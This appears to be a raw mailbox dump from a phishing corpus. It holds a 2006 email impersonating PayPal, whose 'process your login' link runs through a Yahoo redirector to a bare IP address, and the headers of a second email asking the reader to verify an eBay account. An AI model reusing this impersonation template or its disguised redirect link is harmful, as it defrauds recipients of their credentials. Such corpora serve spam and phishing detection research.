From: Update Now <jaguar66@charter.net>
Subject: Notification
Date: Fri, 10 Mar 2006 14:51:38 -0800
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Message-Id: <20060310231048.A10F76CCF5E@mail1.example.com>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 565

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <b>
	tim_patrick@comcast.com</b> as a new email address for your
PayPal account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http://68.120.76.61:60006/bin-cgi/webscr_cmd=_login-run/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using PayPal! <br>
    The PayPal Team </font> </p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance,log in to your 
  PayPal account and click thec Help link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  PayPal page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">PayPal Email ID PP007 </font> </p>
</div>
</body>
</html>

From root@localhost.localdomain  Fri Mar 10 19:28:15 2006
Return-Path: <root@localhost.localdomain>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id D5142536F97
	for <nobody@login.example.com>; Fri, 10 Mar 2006 19:28:14 -0500 (EST)
Received: from localhost.localdomain (unknown [61.186.188.168])
	by mail2.example.com (Postfix) with ESMTP id 04EAA6FA322
	for <nobody@example.com>; Fri, 10 Mar 2006 19:28:10 -0500 (EST)
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.11/8.12.11) with ESMTP id k2B0EOuh012980
	for <nobody@example.com>; Sat, 11 Mar 2006 08:14:24 +0800
Received: (from root@localhost)
	by localhost.localdomain (8.12.11/8.12.11/Submit) id k2B0ENr4012978;
	Sat, 11 Mar 2006 08:14:23 +0800
Date: Sat, 11 Mar 2006 08:14:23 +0800
Message-Id: <200603110014.k2B0ENr4012978@localhost.localdomain>
To: nobody@example.com
Subject: You are required to verify your eBay account
